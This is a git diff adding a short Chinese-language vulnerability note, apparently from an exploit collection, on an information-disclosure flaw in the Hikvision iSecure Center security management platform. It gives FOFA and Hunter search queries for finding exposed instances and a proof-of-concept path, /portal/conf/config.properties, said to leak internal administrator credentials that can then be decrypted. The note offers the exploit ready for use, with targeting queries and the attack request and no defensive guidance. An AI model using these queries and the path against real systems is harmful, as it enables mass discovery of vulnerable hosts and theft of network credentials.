diff --git a/海康威视综合安防管理平台信息泄露.md b/海康威视综合安防管理平台信息泄露.md new file mode 100644 index 0000000..d5f1250 --- /dev/null +++ b/海康威视综合安防管理平台信息泄露.md @@ -0,0 +1,22 @@ + +## 海康威视综合安防管理平台信息泄露 + +HIKVISION iSecure Center综合安防管理平台是一套“集成化”、“智能化”的平台,通过接入视频监控、一卡通、停车场、报警检测等系统的设备,海康威视综合安防管理平台信息存在信息泄露(内网集权账户密码)漏洞,可以通过解密软件,解密用户名密码。 + +## fofa +``` +app="HIKVISION-综合安防管理平台" +``` + +## hunter +``` +web.title="综合安防管理平台" +``` + +## poc +``` +/portal/conf/config.properties + +``` +## 漏洞复现 +![](./assets/20231021220812.png)